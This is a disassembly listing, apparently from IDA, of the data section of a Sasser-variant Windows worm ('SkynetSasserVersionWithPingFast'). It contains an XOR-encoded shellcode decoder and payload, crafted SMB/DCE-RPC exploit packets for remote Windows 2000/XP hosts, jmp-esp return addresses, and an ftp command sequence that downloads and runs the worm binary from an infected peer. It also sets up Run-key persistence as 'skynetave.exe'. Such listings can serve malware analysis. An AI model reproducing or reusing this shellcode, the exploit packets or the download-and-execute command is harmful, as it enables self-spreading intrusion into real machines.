db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DB4�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119�o
align 10h
; char asc_405400[]
asc_405400 db 0Ah ; DATA XREF: __NMSG_WRITE+F1�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3�o
db 0Ah
db 'Program: ',0
align 10h
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+BF�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7D�o
align 4
dword_40543C dd 0 ; ___crtLCMapStringA+36�o
dword_405440 dd 0FFFFFFFFh, 4038B5h, 4038B9haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+D�o
align 4
dword_405488 dd 0FFFFFFFFh, 4048AEh, 4048B2h, 0FFFFFFFFh, 404962h, 404966h
; DATA XREF: ___crtLCMapStringA+5�o
dd 560Ch, 2 dup(0)
dd 5674h, 50E0h, 5540h, 2 dup(0)
dd 576Ch, 5014h, 561Ch, 2 dup(0)
dd 577Ah, 50F0h, 552Ch, 2 dup(0)
db 0CCh
db 57h, 2 dup(0)
dd 5000h, 5614h, 2 dup(0)
dd 57F6h, 50E8h, 5658h, 2 dup(0)
dd 5836h, 512Ch, 5 dup(0)
dd 77DFC41Bh, 77DDEBE7h, 77DD6BF0h, 77E34D78h, 0
dd 7C801D77h, 7C80BE01h, 7C834E64h, 7C838AE7h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C910331h, 7C80929Ch, 7C80E93Fh, 7C8286EEh
dd 7C821363h, 7C80ADA0h, 7C9179FDh, 7C809A51h, 7C9105D4h
dd 7C8127A7h, 7C809915h, 7C812E76h, 7C80A490h, 7C838A0Ch
dd 7C809BF8h, 7C810D87h, 7C937A40h, 7C91043Dh, 7C809AE4h
dd 7C812BB6h, 7C810EF8h, 7C810E51h, 7C838DE8h, 7C80CCA8h
dd 7C812F39h, 7C80CC97h, 7C812F08h, 7C81CF5Bh, 7C80A0D4h
dd 7C814AE7h, 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh
dd 7C81CDDAh, 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h
dd 0
dd 7E41A8ADh, 0
dd 42C367F6h, 0
dd 71AB664Dh, 71AB3E00h, 71AB88D3h, 71AC1028h, 71AB615Ah
dd 71AB428Ah, 71AB2B66h, 71AB3B91h, 71AB406Ah, 71AB9639h
dd 71AB50C8h, 71AB3F41h, 71AB2BF4h, 71AB4FD4h, 0
dd 76D64B79h, 76D64D5Eh, 76D64D33h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 10h
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 4
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 10h
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 10h
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aInternetgetcon db 'InternetGetConnectedState',0
aWininet_dll db 'WININET.dll',0
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0
dd 63490000h, 6553706Dh, 6345646Eh, 6F68h, 63490000h, 7243706Dh
dd 65746165h, 656C6946h, 70690000h, 61706C68h, 642E6970h
dd 6C6Ch, 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 43746547h
dd 616D6D6Fh, 694C646Eh, 41656Eh, 65470000h, 72655674h
dd 6E6F6973h, 0
aExitprocess db 'ExitProcess',0
dd 65540000h, 6E696D72h, 50657461h, 65636F72h, 7373h, 65470000h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 6E550000h
dd 646E6168h, 4564656Ch, 70656378h, 6E6F6974h, 746C6946h
dd 7265h, 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 41h, 65657246h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 577367h, 69570000h, 68436564h, 6F547261h
dd 746C754Dh, 74794269h, 65h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 73h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 5773h, 65530000h, 6E614874h, 43656C64h
dd 746E756Fh, 0
aGetstdhandle db 'GetStdHandle',0
align 4
aGetfiletype db 'GetFileType',0
dd 65480000h, 65447061h, 6F727473h, 79h, 70616548h, 61657243h
dd 6574h, 69560000h, 61757472h, 6572466Ch, 65h, 70616548h
dd 65657246h, 0
aRtlunwind db 'RtlUnwind',0
align 4
aWritefile db 'WriteFile',0
align 4
aMultibytetowid db 'MultiByteToWideChar',0
dd 65470000h, 72745374h, 54676E69h, 41657079h, 0
aGetstringtypew db 'GetStringTypeW',0
align 10h
dd 65470000h, 49504374h, 6F666Eh, 65470000h, 50434174h
dd 0
aGetoemcp db 'GetOEMCP',0
align 4
aHeapalloc db 'HeapAlloc',0
align 10h
aVirtualalloc db 'VirtualAlloc',0
align 10h
aHeaprealloc db 'HeapReAlloc',0
dd 434C0000h, 5370614Dh, 6E697274h, 4167h, 434C0000h, 5370614Dh
dd 6E697274h, 5767h, 161h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset ___initmbctable
dd 0 ; DATA XREF: __cinit:loc_402B6C�o
dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; char Str[]
Str db 'ë' ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
; ---------------------------------------------------------------------------
adc [edx+4Ah], bl
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: .text:00406042�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
dw 0EBE8h
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
loc_40604B: ; CODE XREF: .text:00406044�j
jo short near ptr dword_405A5C+586h
cwde
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
; char *off_4068C8
off_4068C8 dd offset aSkynetave_exe ; DATA XREF: sub_402176:loc_4021CE�r
; sub_402176+B5�r
; "skynetave.exe"
dd offset aLogon ; "Logon"
; char *off_4068D0
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B46+1A�r
; sub_401B46+2D�r
; char *off_4068D4
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B46+77�r
; sub_401B46+84�r
; char *off_4068D8
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B46+A8�r
; sub_401B46+B5�r
; char *off_4068DC
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B46+2BC�r
; sub_401B46+2C9�r ...
; char *off_4068E0
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B46+184�r
; sub_401B46+191�r
; char *off_4068E4
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B46+1B9�r
; sub_401B46+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaLogon db 'Logon',0 ; DATA XREF: .text:004068CC�o
align 10h
aSkynetave_exe db 'skynetave.exe',0 ; DATA XREF: .text:off_4068C8�o
align 10h
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A28 dd 6EB06EBh, 0 dword_406A30 dd 1CEC8166h dword_406A34 dd 0E4FF07h ; char a5_0[]
a5_0 db '5.0',0 ; DATA XREF: sub_401A84+4A�o
; char SubStr[]
SubStr db '5.1',0 ; DATA XREF: sub_401A84+27�o
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_401B46+2DA�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_401B46+1A2�o
align 10h
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B46+173�o
; sub_401F2E+15�o
word_406A5C dw 2Ch ; DATA XREF: sub_401B46+EE�r
align 10h
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_401B46+C6�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_401B46+95�o
align 10h
; char aUser[]
aUser db 'USER',0 ; DATA XREF: sub_401B46+64�o
align 4
; char asc_406A78[]
asc_406A78: ; DATA XREF: sub_401F2E+146�o
unicode 0, < >,0
aSkynetsasserve db 'SkynetSasserVersionWithPingFast',0 ; DATA XREF: WinMain(x,x,x,x)+50�o
aJobaka3 db 'Jobaka3',0 ; DATA XREF: WinMain(x,x,x,x)+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_402176+8C�o
align 4
; char asc_406AD4[]
asc_406AD4: ; DATA XREF: sub_402176+4B�o
unicode 0, <\>,0
align 10h
off_406AE0 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_406AE4 dd 2 ; __NMSG_WRITE+46�r
align 10h
off_406AF0 dd offset __wctype+2 ; DATA XREF: _isalnum+1E�r
; __isctype+12�r ...
dd offset __wctype+2
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: _x_ismbbtype+18�r
; .text:off_406AF0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CFC dd 1 dd 2Eh, 1
dword_406D08 dd 0C0000005h ; _xcptlookup+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D80 dd 3 dword_406D84 dd 7 dword_406D88 dd 0Ah dword_406D8C dd 8Ch ; __XcptFilter+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D9C dd 19930520h, 4 dup(0) ; __NLG_Notify+2�o
dword_406DB0 dd 2 ; __NMSG_WRITE+28�r
off_406DB4 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FC�r
; __NMSG_WRITE+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 405384h, 9, 405358h, 0Ah, 405334h, 10h, 405308h
dd 11h, 4052D8h, 12h, 4052B4h, 13h, 405288h, 18h, 405250h
dd 19h, 405228h, 1Ah, 4051F0h, 1Bh, 4051B8h, 1Ch, 405190h
dd 78h, 405180h, 79h, 405170h, 7Ah, 405160h, 0FCh, 40515Ch
dd 0FFh, 40514Ch
byte_406E40 db 1 ; DATA XREF: __NMSG_WRITE+1B�o
; __setmbcp+E1�r
db 2, 4, 8
align 8
dword_406E48 dd 3A4h dd 82798260h, 21h, 0 ; DATA XREF: __setmbcp+11D�r
dword_406E58 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F38 dd 3F8h ; __heap_alloc+5�r
align 10h
dword_406F40 dd 0BE76A87Dh ; sub_401000+10�w ...
dword_406F44 dd 0 ; sub_401210+D�r
; char Source[]
Source db 4 dup(0) ; DATA XREF: sub_40127D+89�o
; sub_401398+C�o ...
dword_406F4C dd 0 ; char *dword_406F50
dword_406F50 dd 0 ; __setenvp:loc_402E51�r ...
align 8
dword_406F58 dd 0 ; _fast_error_exit�r ...
dd 3 dup(0)
dword_406F68 dd 0A28h dword_406F6C dd 501h dword_406F70 dd 5 dword_406F74 dd 1 dword_406F78 dd 1 dword_406F7C dd 0AD0ED0h dd 0
dword_406F84 dd 0AD0D70h dd 3 dup(0)
off_406F94 dd offset aCM_unpackerPac ; DATA XREF: __setargv+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_406F9C db 0 ; DATA XREF: _doexit+2D�w
align 10h
dword_406FA0 dd 0 dword_406FA4 dd 0 dword_406FA8 dd 0 ; __XcptFilter+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv:loc_402F0F�o
; .text:off_406F94�o
align 4
dd 2Dh dup(0)
dword_40707C dd 0Dh dup(0) ; .text:00406638�o ...
dword_4070B0 dd 1 ; ___crtGetEnvironmentStringsA+23�w ...
dword_4070B4 dd 0 dword_4070B8 dd 1 ; ___crtGetStringTypeA:loc_403826�w
dword_4070BC dd 1 ; _getSystemCP+4�w ...
dword_4070C0 dd 0 ; ___crtMessageBoxA+2E�w ...
dword_4070C4 dd 0 ; ___crtMessageBoxA:loc_404662�r
dword_4070C8 dd 0 ; ___crtMessageBoxA+60�r
dd 2 dup(0)
dword_4070D4 dd 0 dd 3 dup(0)
dword_4070E4 dd 0 ; _getSystemCP+3A�r ...
dd 0
dword_4070EC dd 1 ; ___crtLCMapStringA+4C�w ...
dword_4070F0 dd 0 dword_4070F4 dd 0 dword_4070F8 dd 10h ; ___sbh_alloc_new_region+5�r ...
dword_4070FC dd 0 ; ___sbh_free_block+259�r ...
dword_407100 dd 320650h ; ___sbh_free_block+310�w ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init:loc_403DE7�w
; ___sbh_free_block+22C�r ...
dword_407108 dd 1 ; ___sbh_find_block�r ...
dword_40710C dd 320650h ; ___sbh_find_block+8�r ...
dword_407110 dd 4E4h ; __setmbcp+65�w ...
align 10h
dword_407120 dd 3 dup(0) ; __setmbcp+171�o ...
dword_40712C dd 0 ; __setmbcp+15D�w ...
dd 4 dup(0)
byte_407140 db 0 ; DATA XREF: _setSBUpLow:loc_403C92�w
; _setSBUpLow:loc_403CAF�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407240 db 0 ; DATA XREF: __setmbcp+5C�o
; __setmbcp+AF�o ...
byte_407241 db 0 ; DATA XREF: _parse_cmdline+3F�r
; _parse_cmdline+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_407344 dd 0 ; __setmbcp+12B�w ...
dword_407348 dd 320000h ; __heap_init+29�r ...
dd 5 dup(0)
dword_407360 dd 0AD0EF0h ; __ioinit+45�r ...
dword_407364 dd 3Fh dup(0) dword_407460 dd 20h ; __ioinit:loc_403301�r ...
dword_407464 dd 1 dword_407468 dd 1 dword_40746C dd 0 dword_407470 dd 0 dword_407474 dd 0 dword_407478 dd 142340h dd 6E1h dup(0)
_text ends
; Section 3. (virtual address 0001A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 41A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start